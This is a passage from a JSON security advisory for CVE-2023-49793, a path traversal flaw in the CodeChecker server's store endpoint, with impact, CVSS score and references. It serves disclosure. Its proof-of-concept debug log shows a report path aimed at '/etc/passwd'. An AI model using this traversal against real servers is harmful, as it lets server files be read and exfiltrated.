\u0027/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43\u0027 directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1175 __store_reports() - Parsing input file \u0027sample.plist\u0027\n[DEBUG][2023-10-25 14:30:31] {report-converter} [2043] \u003c139754026274816\u003e - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:987 __process_report_file() - Storing report to the database...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:827 __add_report_context() - Storing bug path positions.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:834 __add_report_context() - Storing bug path events.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:842 __add_report_context() - Storing notes.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:853 __add_report_context() - Storing macro expansions.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s).\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1260 finish_checker_run() - Finishing checker run\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1397 store() - \u0027Anonymous\u0027 stored results (3 KB /decompressed/) to run \u0027poc\u0027 (id: 16) in 0.15 seconds.\n[INFO][2023-10-25 14:30:31] {store_time} [2043] \u003c139754026274816\u003e - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, \"Default\", \"poc\", 3KB, 1, 16\n[DEBUG][2023-10-25 14:30:31] {profiler} [2043] \u003c139754026274816\u003e - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun\n```\n\u003c/details\u003e\n\n## Impact\nThe path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server` process. This allows for the exfiltration from the server-side storage medium.\nIf the `CodeChecker server` is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the `CodeChecker server`, with the permission to store to a database, and view the stored reports.\n\nCVSS 3.1 Base Score: 6.5\n[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\u0026version=3.1)\n\nReproducible up to version `6.22.1`.",
"id": "GHSA-h26w-r4m5-8rrf",
"modified": "2024-06-26T21:56:26Z",
"published": "2024-06-24T16:18:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49793"
},
{
"type": "WEB",
"url": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a"
},
{
"type": "PACKAGE",
"url": "https://github.com/Ericsson/codechecker"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-54.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`"
}
Loading...